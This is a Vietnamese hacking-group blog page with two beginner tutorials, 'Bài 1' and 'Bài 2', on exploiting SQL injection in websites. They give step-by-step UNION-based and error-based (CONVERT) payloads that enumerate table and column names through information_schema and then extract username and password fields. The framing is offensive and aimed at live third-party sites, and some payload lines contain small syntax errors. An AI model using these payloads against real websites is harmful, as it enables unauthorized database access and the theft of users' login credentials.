Hacking - Security

Welcome to Mr Quý's Blog

Software

Nơi lữu trữ những phần mềm hữu ích cho cuộc sống

Tin Tức 24h

Nơi thường xuyên cập nhật những tin tức nóng trong và ngoài nước

Thiết Kế Đồ Họa

Nơi trưng bày những tác phẩm và bài học từ thiết kế đồ họa

Hacking SQLi

Lỗ hổng bảo mật SQLi của những trang web trong và ngoài nước

Thứ Năm, 25 tháng 9, 2014

Khuôn check ASPX SQLi

Bài 2: Training For Newbie các bước Check site lỗi ASPX đơn giản
-------------------------------------------------------------
Khai thác lỗi SQL ASPX:
+ Bước 1: AND 1=CONVERT(INT,(SELECT top 1 TABLE_NAME FROM information_schema.TABLES))-- -
+ Bước 2: AND 1=CONVERT(INT,(SELECT top 1 TABLE_NAME FROM information_schema.TABLES WHERE TABLE_NAME NOT IN ('tbl_DangNhap')-- -
Trong phần < NOT IN (.....)-- -> viết lệnh tiếp để ra các table, có nghĩa là khi bạn có được một "table" nào đó thì mình bỏ tiếp cái "table" đó vào để check cho nó xuất hiện "table" tiếp theo
- Các bạn lưu ý dùm mình là "tbl_DangNhap" là table mình chỉ lấy ví dụ thôi nhé ko phải site nào ASPX cũng là kiểu tbl_DangNhap đâu đấy, vì thế các bạn nên linh hoạt trong việc tìm kiếm Table và thực hành càng nhiều thì kinh nghiệm đoán Table càng cao, nên tích hợp những Table mà mình tìm được vào 1 Notepad để khi cần có cái mà dùng.
+ Bước 3: AND 1=CONVERT(INT,(SELECT top 1 column_name FROM information_schema.COLUMNS WHERE TABLE_NAME=('tbl_DangNhap') ))-- -
=>> được thông số 'ID' tiếp
AND 1=CONVERT(INT,(SELECT top 1 COLUMN name FROM information_schema.COLUMNS WHERE TABLE_NAME=('tbl_DangNhap') AND column_name NOT IN('ID') ))-- -
được thông số 'username' tiếp
AND 1=CONVERT(INT,(SELECT top 1 column_name FROM information_schema.COLUMNS WHERE TABLE_NAME=('tbl_DangNhap') AND column_name NOT IN ('ID'),'username') ))-- -
được thông số password
+ Bước 4: Khai thác thông tin username và password:
username:
AND 1=CONVERT(INT,(SELECT top 1 username FROM tbl_DangNhap))-- -
passord:
AND 1=CONVERT(INT,SELECT top 1 password FROM tbl_DangNhap))-- -
Quý Huỳnh, Admin VN-Hacking Group
Copy xin để lại nguồn
---------------------- The End Check Site SQL ASPX ----------------------

Khuôn check SQLi Basic


Bài 1: Training For Newbie các bước CHECK Site lỗi SQL
  •  SQL Basic
  • -------------------------------------------------------------
  •  Khai thác lỗi SQL cơ bản:
  •  Bước 1: ORDER BY 100-- -
  •  Bước 2: UNION SELECT 1,2,3,4,5,6,7,8,9,10-- -
  •  Bước 3: UNION SELECT 1,2,3,group_concat(TABLE_NAME),5,6,7,8,9 FROM information_schema.TABLES where table_schema=database()-- -
  • Các bạn lưu ý là những con số trên là con số mình ví dụ ko phải là con số thực ở các Website vì vậy hãy luôn linh hoạt trong việc check site
  •  Bước 4: UNION SELECT 1,2,3,group_concat(column_name),5,6,7,8,9 FROM information_schema.COLUMNS WHERE table_schema=DATABASE()--
  •  Bước 5: UNION SELECT 1,2,3,group_concat(column_name),5,6,7,,8,9 FROM information_schema.COLUMNS WHERE table_schema=DATABASE() AND TABLE_NAME=0x... -- -

VD: User = 0xuser
Mã hóa "user" sang HEX: User = 75736572
Chú ý: ở chổ "..." là TABLE mà được mã hóa sang mã hex
=>>VD get được username và password
Ta thay thế "username và password" vào chổ Column_name để lấy hẳn thông tin chính xác cụ thể
  •  Bước 6: UNION SELECT 1,2,3,group_concat(username,0x20,password,0x20),5, 6,7,8,9 FROM TABLE_NAME

=> Đằng sau cụm FROM TABLE_NAME các bạn chú ý là chổ table_name đó là cái table mà bạn đã tìm được ở Bước số 3
Quý Huỳnh, Admin VN-Hacking Group
Copy xin để lại nguồn.
--------------------- The End Check Site SQL Basic --------------------